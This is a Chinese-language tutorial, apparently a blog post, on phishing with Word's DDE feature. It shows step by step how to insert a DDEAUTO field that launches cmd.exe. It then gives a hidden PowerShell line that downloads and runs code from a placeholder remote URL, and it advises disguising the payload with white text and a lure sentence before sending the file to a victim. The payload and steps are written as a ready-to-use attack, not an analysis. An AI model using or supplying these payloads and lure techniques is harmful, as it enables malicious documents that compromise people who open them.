Office釣魚攻擊之DDE

通過Windows的office,可以實施許多釣魚攻擊,這里對其中的DDE惡意程序進行釣魚攻擊,通過代碼調用受害者本地程序。

最終實現(xiàn)效果如下:


實現(xiàn)效果

環(huán)境

文中使用的環(huán)境如下(可采用其他版本的系統(tǒng)和office):
攻擊機:

  • Windows 10
  • Microsoft Office 2016
    靶機:
  • Windows 10
  • Microsoft Office 2016

相關知識

  • 釣魚攻擊:釣魚式攻擊是指企圖從電子通訊中,通過偽裝成信譽卓著的法人媒體以獲得如用戶名、密碼和信用卡明細等個人敏感信息的犯罪詐騙過程。
  • DDE:Microsoft 的動態(tài)數(shù)據交換 (DDE) 是一種旨在允許在 MS Office 應用程序之間傳輸數(shù)據的協(xié)議。它在共享數(shù)據的應用程序之間發(fā)送消息并使用共享內存在應用程序之間交換數(shù)據。 應用程序可以使用 DDE 協(xié)議進行一次性數(shù)據傳輸和連續(xù)交換,其中應用程序在新數(shù)據可用時相互發(fā)送更新。

釣魚文件準備

新建一個Word文件,打開,依次點擊插入->文檔部件->

插入域

在彈出的對話框中點擊確定:
點擊確定

可以看到如下所示界面,顯示!異常的公式結尾
插入之后

右鍵單擊,選擇切換域代碼
右鍵單擊

變成如圖所示的樣子:
切換域代碼

刪掉= \* MERGEFORMAT,輸入代碼:

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
輸入代碼

其中的代碼可以換成更加復雜的語句,例如:

DDEAUTO  "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\..\\Windows\\system32\\cmd.exe /c 
pOWeRShELl.exe  -NoP -W Hidden IEX(nEw-oBjECt sYstEM.nEt.wEBcLIeNt).dOWnLoADsTRiNg('http://遠程惡意代碼文件地址');

該語句將從遠程下載惡意代碼,并使用powershell執(zhí)行。
然后保存即可(為了釣魚效果,可在該行代碼前添加誘導性語句,將該行文字顏色改成白色以掩蓋痕跡)。

攻擊實施

將文件發(fā)給受害者,當受害者在靶機打開文件時,出現(xiàn)彈窗警告:


彈窗

選擇是,接著出現(xiàn)下一個彈窗:


下一個彈窗

選擇是,就可以看到本地計算器程序被喚起,惡意代碼執(zhí)行成功:
執(zhí)行成功

參考鏈接

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

友情鏈接更多精彩內容